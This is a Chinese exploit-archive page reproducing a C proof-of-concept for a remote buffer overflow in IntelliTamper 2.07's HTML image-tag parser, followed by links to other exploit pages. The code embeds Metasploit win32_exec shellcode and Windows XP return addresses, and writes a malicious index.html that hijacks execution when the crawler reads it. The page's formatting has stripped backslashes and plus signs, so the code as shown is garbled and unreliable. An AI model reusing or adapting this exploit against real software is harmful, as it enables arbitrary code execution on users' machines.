手机
当前位置:查字典教程网 >网络安全 >Exploit >IntelliTamper 2.07 (imgsrc) Remote Buffer Overflow Exploit
IntelliTamper 2.07 (imgsrc) Remote Buffer Overflow Exploit
摘要:/**IntelliTamper2.07(imgsrc)RemoteBufferOverflowExpoit**Discovered&Wri...

/*

* IntelliTamper 2.07 (imgsrc) Remote Buffer Overflow Expoit

*

* Discovered & Written by r0ut3r (writ3r [at] gmail.com)

* Many Thanks to Luigi Auriemma (http://aluigi.org)

*

* Greets to shinnai (http://www.shinnai.net)

* and Guido Landi

*

* IntelliTamper contains a remote buffer overflow vulnerability.

* The HTML parser, more precise the image tag fails to preform

* boundary checks on supplied data.

*

* kit:/home/r0ut3r/public_html/imgsrc-xpl # gcc -o yahh yahh.c

* kit:/home/r0ut3r/public_html/imgsrc-xpl # ./yahh 0

* [!] OS: Microsoft Windows XP Pro SP 2

* [ ] Building payload

* [ ] Inserting JMP code

* [ ] Success writing to index.html

* kit:/home/r0ut3r/public_html/imgsrc-xpl #

*/ #include <stdio.h>

#include <stdlib.h>

#include <string.h> /* win32_exec - EXITFUNC=thread CMD=c:windowssystem32calc.exe Size=184

Encoder=PexFnstenvSub http://metasploit.com

Filtered characters: 0x00 0x22 0x09 0x0a 0x0d 0x3c 0x3e */

unsigned char shellcode[] =

"x31xc9x83xe9xd8xd9xeexd9x74x24xf4x5bx81x73x13x99"

"xebx8dx6ax83xebxfcxe2xf4x65x03xc9x6ax99xebx06x2f"

"xa5x60xf1x6fxe1xeax62xe1xd6xf3x06x35xb9xeax66x23"

"x12xdfx06x6bx77xdax4dxf3x35x6fx4dx1ex9ex2ax47x67"

"x98x29x66x9exa2xbfxa9x6execx0ex06x35xbdxeax66x0c"

"x12xe7xc6xe1xc6xf7x8cx81x12xf7x06x6bx72x62xd1x4e"

"x9dx28xbcxaaxfdx60xcdx5ax1cx2bxf5x66x12xabx81xe1"

"xe9xf7x20xe1xf1xe3x66x63x12x6bx3dx6ax99xebx06x02"

"xa5xb4xbcx9cxf9xbdx04x92x1ax2bxf6x3axf1x04x43x8a"

"xf9x83x15x94x13xe5xdax95x7ex88xb7x36xeex82xe3x0e"

"xf6x9cxfex36xeax92xfex1exfcx86xbex58xc5x88xecx06"

"xfaxc5xe8x12xfcxebx8dx6a"; #define JMP 0xe9 //JMP int main(int argc, char* argv[])

{

FILE *fd;

unsigned char buff[4000],

*jmpref,

*p;

int opt; struct

{

char *os;

unsigned int eip;

} targets[] =

{

"Microsoft Windows XP Pro SP 2",

0x7d040e1f, "Microsoft Windows XP Pro SP 3",

0x7c8369f0

}; if (argc < 2)

{

printf("---------------------------------------------------------n");

printf(" IntelliTamper 2.07 Remote Buffer Overflow Expoit nn"); printf(" Discovered & Written by r0ut3r (writ3r [at] gmail.com)n");

printf(" Thanks to Luigi Auriemma (http://aluigi.org)nn"); printf(" Usage: %s <OS-type>n", argv[0]);

printf(" 0: Microsoft Windows XP Pro SP2n");

printf(" 1: Microsoft Windows XP Pro SP3n");

printf("---------------------------------------------------------n");

return 1;

} p = buff; switch (atoi(argv[1]))

{

case 0:

opt = 0;

printf("[!] OS: %sn", targets[0].os);

break; case 1:

opt = 1;

printf("[!] OS: %sn", targets[1].os);

break;

} printf("[ ] Building payloadn");

p = sprintf(p, "<img src="http://"); jmpref = p; p = sprintf(p, "%s", shellcode); int i;

int a = 3065 - (p - jmpref);

for (i=0; i < a; i )

*p = 'A'; *(unsigned int *) p = targets[opt].eip;

p = 4; printf("[ ] Inserting JMP coden"); *p = JMP;

*(unsigned int *) p = jmpref - (p 4); //JMP -(3065 4 5)

p = 4; p = sprintf(p, "">"); fd = fopen("index.html", "wb");

if (fd == NULL)

{

perror("[-] Failed opening index.htmln");

return 1;

} fwrite(buff, 1, p - buff, fd);

if (fclose(fd) == 0)

printf("[ ] Success writing to index.htmln");

else

printf("[-] Failed writing to index.htmln"); return 0;

}

【IntelliTamper 2.07 (imgsrc) Remote Buffer Overflow Exploit】相关文章:

AlstraSoft Affiliate Network Pro (pgm) Remote SQL Injection Vulnerability

Discuz! 6.0.1 (searchid) Remote SQL Injection Exploit

TGS CMS 0.3.2r2 Remote Code Execution Exploit

Maian Gallery 2.0 Insecure Cookie Handling Vulnerability

Xerox Phaser 8400 (reboot) Remote Denial of Service Exploit

Rianxosencabos CMS 0.9 Remote Add Admin Exploit

Sagem Routers F@ST Remote CSRF Exploit (dhcp hostname attack)

Dana IRC 1.4a Remote Buffer Overflow Exploit

MS Internet Explorer Recordset Double Free Memory Exploit

NaviCOPA Web Server 2.01 Remote Buffer Overflow Exploit (meta)

精品推荐
分类导航